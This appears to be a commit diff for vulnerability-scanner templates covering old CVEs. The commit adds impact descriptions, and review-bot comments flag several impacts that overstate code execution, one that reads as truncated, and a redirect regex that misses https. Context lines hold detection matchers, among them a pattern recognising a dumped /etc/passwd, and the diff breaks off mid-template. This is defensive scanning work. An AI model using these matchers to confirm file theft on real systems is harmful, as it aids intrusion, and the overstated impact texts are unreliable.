Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402202feaa0d486d5070e9e7bfd4efd73233251cc5396a98dfc67390f6a5630c2e633022010d10fb2d53407cc4f72002217767dfdf8eef452f44b74b5fe6c27a5029e9c99:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402206851937b7e99292685636e8eef2e6b0b33d2b8d19446ba160013767d605e5fbb0220103e5f70323feb34b2b691f0e0fc3c7c89a457f0e351756ea16091a69d38e1c7:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.
remediation: | remediation: |
Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022033f0c2315a611613fda0fb73c18a12113fa19156574aefbf477b092d512c58710221009494212e159047a9d4f26d0d900af8c3a6c04abb2086da29e47e858052513990:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100ad5280aa6eac0929495f63d9882328a6c7dfd9bc0e135183d17a7c4cbc1e741e02203c987c6747a3bd616cd71adf3e491eeaee52d52f4dc1c2e0d5041d063956d83c:922c64590222798bb761d5b6d8e72950
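Review bot: The added `impact` claims an attacker can "potentially execute arbitrary code", but the `description` only says arbitrary files can be read via the `_language` parameter, and severity is medium. The reference list is outside the hunk, so code execution may be supported there. If it is not, keep the impact to what the description states, e.g. `An attacker can read arbitrary files on the server, exposing configuration data and credentials.` The ionFiles, Pro Desk, Cmimarketplace and Projectfork sections below have the same mismatch: the impact mentions remote code execution while the description covers only file read or directory listing.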


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c9a4ffd62555b868c4f74ccec0a683f901fce786056f157a2b745ae2d175c6c902200803e8831676633b7e4035222f60a624ca213872992d2bdf3e6024bc574be95a:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e01b4968812ad7ad9b056cd634b2606c5650c02cf33012f5aef863b48bc969340220533ab0def58e9b6e81e56a8ae60e8116c2a03ef694aa21fc9601afd4798bce87:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: | remediation: |
Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. Update Joomla! Component RWCards to the latest version to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a0048304602210095f2553fda2f3bf455c5d6646d07cd536a1461506147b3d9f7c73b2c95aaa238022100cd50381518519c3903ec58739cca597e15d2f61c984c96e95876e26a79b860b7:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aef3f723e04346fa7a2f8ac6c5abcf0174ca81a3aeb442367ae4d018f6ff964d0220337061d4274cc4456d6d13a49d5c1782ecb4b44cade9063e2389ffe246990c55:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100e1afab8f9b7ea6d75940642627e9093d1248edb6b7f67043b5d83c2234eab0ea02206f00bafb8c8bdd919ddfde1f0d342b74d4d12749e255eca7e04072de4c509453:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100fff4f0725abf21bcf55b6825cfd022b20b75e41e680ce18e4b08169f2923f78102210092bfa1840e5d2b94020d6226d2bbb157df2c1f344bef122db55ec8da3aba7044:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
reference: reference:
@ -51,4 +53,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100b80eb05b64f804b1723e8d639c5985bc0aa09179c5f49be126abebb760da43db022100cda31ba602da0faee37f3838369448ee852a5c9a1b2c14cf70103dd503be9475:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402202610c0f8d75d86e21ed6b2d7639a5f879540ed64700ccef63d61d5c49545056802200ccac5c2868b1a18b7542ad02343694a9839c8aa827db9bfde1ab7ba81d1844c:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
remediation: | remediation: |
Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100854eb0a19f68fd8f0c16b795237778394d481fedef431451051251d791f7e7d202203cc01a5cbd10885ed29bef8ebf64d830be1f221982512b569ffd9a9a79fdc8b4:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f317aa209617a0ac0f5b27dc38710858835641d5769cd8499709bad9cc17fa84022100b0cb6a925a432d6b22fd4ee7412c7fb438956de1fe797d92627665c8aee77a32:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to the latest version to mitigate this vulnerability. Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 500 - 500
# digest: 4a0a0047304502201dea20a32ebb693d393be0d294a74bfb5b9eecb6827a8f58f157213a60428483022100e6ccfd9ff53c1724d243de900f9df24ec006a615484403dbdafa7537a3f0adca:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022060c1d7a1d7f167f4a7725386e3770f50fc41cf720cfb3766a490be90bbfc632902207e45517728eabf9310ab9dc5a100c296a85431a2f94ce584aefb7d6c05833a1f:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
impact: |
An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.
remediation: | remediation: |
Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.
reference: reference:
@ -38,4 +40,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a0047304502203ea8208e5f9c9a959ba132a829842ec16412e7e89e96459e772d992c1a0b419c022100bd66f70af78b54921981fa5210b7501871ae6c713617a56758b1f9b014f98e92:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022051577f83aae8349027a0a3bfc2ed4386c0b9e1c09644dc0ddd098802e023c7e0022100e69fe1be6eeae6d3523eaf92aa776f94d0e42396edf72f348c0378ef7cd1da9c:922c64590222798bb761d5b6d8e72950
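Review bot: The redirect matcher on the context line uses `http?://`, which makes the `p` optional rather than allowing an `s`, so a `Location` header pointing at `https://…interact.sh` is not matched and a vulnerable host can go unreported. The line is unchanged by this commit, but the template is re-signed with it. Changing the scheme group to `(?:https?://|//)` would cover both schemes, as the AWStats template later in this commit already does with `https?:\/\/`. The `http` block starts above the hunk.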


@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: critical severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
remediation: | remediation: |
Upgrade to a patched version of ZeroShell. Upgrade to a patched version of ZeroShell.
reference: reference:
@ -37,4 +39,4 @@ http:
part: body part: body
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
# digest: 490a0046304402203105e50de1b89b0165f438c48a50bd8a44fa30fe03592c5339c4a2949854804f02205fe7cbf331da5c49f1ac8be6ab55653b4358eb25d9be80a5c5df917c3cf205a2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c159232e524cc33af61389e36bdf93790ac051100d465a44d101fed437d6d01902204c3f4b377b80d05a6d606971b970a5f55e7a05e99e48a7ded66295d9c1c523c2:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100a48cabc5ed3721b402591d4860fd38d126b7e940ba2c6425733a7625ad7cabea0220690367ee6216c533f32eee62a5df670afffdd17227db036d876ae0a981872bdb:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100907faaad405c2236acd897cde184a91ef45ebbb033646c1c1e188b95abf7c2c202207c5a4151cd8bfbbf28ff42b726095b019cc0d25d4d1e2105313cc0a7cbd516a9:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: princechaddha author: princechaddha
severity: high severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
remediation: | remediation: |
Update PhpMyAdmin to the latest version or apply the necessary patches. Update PhpMyAdmin to the latest version or apply the necessary patches.
reference: reference:
@ -47,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008e02fe97aa25d53673b25be320c0bb7d2c2f5de32b0479a6642d19caeac3176302204fbb68c73be955fb7ee136f5de9ba91f1183b932cd44a37339a3cb3629f682ff:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022072b55f94dd31deffee60f3cb3634845a62d55cb762cc7ff386cbb87e86628a46022100f409fca70224214acee88679b54a62d491ea8aa4097e70f6ae316fefbf08c8dc:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100bf287275ed797bae0cb3d5d4acfc9b8e5bd3828436e45f96592c55c65cb1baa4022100ef79bc142d4be9f1c8cdca1b30e44293bf696b5686318e5ae13a18638f2267ad:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c631ca9827b32f40f6e831f6b142d509929a3a274aaa2539bd9a3bc70a6a277902202282dc777de13ade8043e5e0b684506c08b0f8362cece8841ae64f2d12922f4c:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
remediation: | remediation: |
Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022072672def0c3c68dd608f3004581175afa8c339fb1dbe169c26b79537cc7a0619022100c7d94e2588ae1fc4f1093b3f7e02e4d2aa8e3d985506056636a77e58ba170c1f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221009c71a1215235e49ed75ae5b6eeee4ad1e9cf5c5fbc2255aa4d4100800dbcc4ba022100814e7f6abe3bd9504fea75427a7595f0867986ff0f82ad2a6723448d3890a0ab:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: princechaddha author: princechaddha
severity: medium severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100f880585c3b7a9bf4bace78a0d12cc7b59987555063071d3b42d5a6ec991e5fc402206d9ea98a5964a7b6b3fd001ec59a4a6a4018795896552e88707057bbf2984cf1:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bcb065b4315286d0190f8d478c738b86bc6bbf0a9eee7e6b4c473e41e01c1802022100c1f7c414f91bd4fa0876cc2bd72f1be77b892b1d20003177d66640667e38aa3b:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
remediation: | remediation: |
Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100ecd994a0eb2717ce10c4b5c91e5280c1fd8fac39010ab27a6e7dd81ad84421d3022061a0659d0ab3cf0e69480b1407ab7d15ea63da4942aa97535f935fe18c40d1ae:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d8c26e00ba2ed5716865bac39ee41243548410e07a5e04e196f13ecb86b5f6f0022029bacb42734f85338a1131945160673281e9ebda83ca881f2aba07019b4c2330:922c64590222798bb761d5b6d8e72950
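Review bot: The added `impact` sentence ends in a comma list with no conjunction ("potentially leading to unauthorized access, information disclosure."), which reads as if it were truncated. Suggested wording: `The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access and information disclosure.` The Roland Breedveld Album section below has the same construction ("unauthorized access, data disclosure.").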


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
remediation: | remediation: |
Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100843946ac00e19969b2641e5f8b8c44b890e6dd8226f04c95aa84a62843d6219b0221009a53d57de2bfea8a7b8bb17dd7fd7b8ae9299a4080a7610269331a945dc481df:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210091f181784616328a479c0a45ea51ca6e3ec45cf35125c50b1a74018f9dd535a7022100dc27152143b4d3818133866645b2e1e1f647b142875a267d0667d9e9c7c867f9:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100b811a5bc6dc389222b5a3b2f6348b1bcdc4da180e2f621afdd6b06581e7db2be022100f760318fa5da56e59b4164508d2560e355438a21041091b07eb695f19467d51d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100a1f28b173218b3d629d38aced121196c827be859dc4aca670b95c7b18307b430022049aa913dbdffabe7a2c1cf439f0b580f53add89ba434c8ad0a2a22652bd51bc4:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.
remediation: | remediation: |
Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022025c84025809994ed122c6b1eee98bcf3d7b45244c28b2e007708b624f8fed7ca022100e65d6b60af4d2ac032f3e91762da0bb8d31027cf10958a2c6de7112ec4c2aa69:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205a8d55e39ef2ea81aef6917c75f74e1c17a628dc7048d68593bbf43b03dc8d86022100ebf7f9db037558e784a25d3fbb3d33cd5aaaa5cfef70c4974e29a2bc48f623b8:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100cc34793390f6a455392251d314e76db191c695bb242f901992f2fed5d30deb2a02203db9da85de2f6409024c76ec318dee40be8344b6c1484486afbb1a6986bcf231:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220039a98604f42ee7ccff3678a04d529befe9dd08295868ac0d4e6e725a91cbfd10220045ad4a883e12545de1290ad6fed5f97abefbc452ac43de71e42e1904acbebb7:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: high severity: high
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
impact: |
An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.
remediation: | remediation: |
Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100a31c2cc438bd399b0ff46d0737df967df4f8636a9545dacfb35f4c0fd16fbfe8022100d8ff3adcae6bbe7f02f215edf09b98d9890993edad83c73ddbfad540d5862f9e:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f241e186edb9af52a94d640b6a9e57852c75c54669bd59af1aafb3cf6ee08258022100c680d5c1c0b6b27a520c2401d2c1aa0a9978874b840bf8f52c24ba6fc4c50121:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: high severity: high
description: | description: |
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: | remediation: |
Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008b806c6b509027ab419fab38023c2270cef1e3f60dc3b633fcacb5f8983dd8cf02205a10ec21151ba918555d2ea46f2e687dc5d87cec0d39ebc0a0b57409e230999f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fd99275b8ffe3388f14498c542a677e467dc6409ffdede89b682d47aa5e98d8b02205e878695cd94db9f7e485d448c02aa9df416a8c7cfd6d160dc8197f103e279d7:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: pdteam author: pdteam
severity: medium severity: medium
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
impact: |
Allows attackers to redirect users to malicious websites or phishing pages.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - https://nvd.nist.gov/vuln/detail/CVE-2009-5020
@ -35,4 +37,4 @@ http:
part: header part: header
regex: regex:
